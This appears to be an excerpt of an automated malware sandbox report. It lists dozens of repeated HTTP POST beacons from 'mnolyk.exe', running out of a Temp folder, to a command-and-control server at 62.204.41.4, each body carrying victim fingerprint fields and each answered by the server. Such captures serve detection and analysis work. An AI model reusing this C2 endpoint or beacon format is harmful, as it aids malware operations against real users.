                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.416800022 CET666INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        466192.168.2.55015662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:54.587905884 CET666OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.652446032 CET667INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        467192.168.2.55015762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:54.822505951 CET667OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.886236906 CET668INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        468192.168.2.55015862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:55.072146893 CET668OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.137774944 CET669INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        469192.168.2.55015962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:55.306571960 CET669OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.369514942 CET670INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        47192.168.2.54973762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:52.313327074 CET248OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.378164053 CET248INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        470192.168.2.55016062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:55.547494888 CET670OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.611332893 CET671INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        471192.168.2.55016162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:55.790925026 CET671OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.854116917 CET672INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        472192.168.2.55016262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:56.026170015 CET672OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.090836048 CET673INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        473192.168.2.55016362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:56.264796972 CET673OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.329933882 CET674INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        474192.168.2.55016462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:56.510220051 CET674OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.573378086 CET675INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        475192.168.2.55016562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:56.744687080 CET675OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.808456898 CET676INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        476192.168.2.55016662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:56.977674007 CET676OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.042531967 CET677INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        477192.168.2.55016762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:57.212251902 CET677OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.275357962 CET678INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        478192.168.2.55016862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:57.456115007 CET678OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.522361994 CET679INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        479192.168.2.55016962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:57.700716019 CET679OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.764674902 CET680INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        48192.168.2.54973862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:52.550399065 CET249OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.614141941 CET249INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        480192.168.2.55017062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:57.930319071 CET680OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.992721081 CET681INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        481192.168.2.55017162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:58.166615963 CET681OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.233177900 CET682INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        482192.168.2.55017262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:58.399243116 CET682OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.462138891 CET683INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        483192.168.2.55017362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:58.637896061 CET683OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
